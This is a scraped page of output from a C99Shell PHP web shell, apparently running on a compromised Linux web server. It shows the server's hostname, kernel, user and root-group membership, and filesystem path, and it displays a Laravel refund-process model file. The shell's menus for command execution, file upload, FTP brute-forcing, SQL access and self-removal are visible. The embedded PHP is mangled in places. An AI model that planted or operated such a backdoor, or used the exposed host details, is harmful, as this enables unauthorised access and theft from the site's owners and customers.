!C99Shell v. 2.5 [PHP 8 Update] [24.05.2025]!

Software: Apache. PHP/8.1.30 

uname -a: Linux server1.tuhinhossain.com 5.15.0-151-generic #161-Ubuntu SMP Tue Jul 22 14:25:40 UTC
2025 x86_64
 

uid=1002(picotech) gid=1003(picotech) groups=1003(picotech),0(root)  

Safe-mode: OFF (not secure)

/home/picotech/domains/ecom1.picotech.app/public_html_ecom1/Modules/Refund/Entities/   drwxr-xr-x
Free 26.47 GB of 117.98 GB (22.44%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Self remove    Logout    


Viewing file:     RefundProcess.php (2.14 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php

/**
 * @package RefundProcess model
 * @author TechVillage <support@techvill.org>
 * @contributor Al Mamun <[almamun.techvill@gmail.com]>
 * @created 24-02-2022
 */

namespace Modules\Refund\Entities;

use 
App\Models\Model;
use 
App\Services\Mail\RefundMailService;

class 
RefundProcess extends Model
{
    
/**
     * timestamps
     *
     * @var boolean
     */
    
public $timestamps false;

    
/**
     * Relation with Refund model
     *
     * @return \Illuminate\Database\Eloquent\Relations\BelongsTo
     */
    
public function refund()
    {
        return 
$this->belongsTo(Refund::class);
    }

    
/**
     * Relation with User model
     *
     * @return \Illuminate\Database\Eloquent\Relations\BelongsTo
     */
    
public function user()
    {
        return 
$this->belongsTo(\App\Models\User::class);
    }

    
/**
     * Store Refund Process
     *
     * @param array $data
     * @return array $response
     */
    
public function store($data)
    {
        
$response = ['status' => 'fail''message' => __('Something went wrong, please try again.')];

        
$refund Refund::where(['id' => $data['refund_id']]);
        if (
$refund->count() == || !in_array($refund->first()->status, ['Opened''In progress'])) {
            return 
$response;
        }

        
$data['user_id'] = auth()->user()->id;
        if (
parent::insert($data)) {
            if (
$refund->first()->status == 'Opened') {
                
$refund->update(['status' => 'In progress']);

                
$refund $refund->first();
                
$refund['user_id'] = optional($refund->user)->id;
                
$refund['total'] = $refund->quantity_sent optional($refund->orderDetail)->price;
                
$refund['order_id'] = optional(optional($refund->orderDetail)->order)->reference;
                
$refund['vendor_email'] = optional(optional($refund->orderDetail)->vendor)->email;
                (new 
RefundMailService)->send($refund);
            }
            
$response = ['status' => 'success''message' => __('Message has been successfully send.')];
        }
        return 
$response;
    }
}

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.5 [PHP 8 Update] [24.05.2025] | Generation time: 0.004 ]--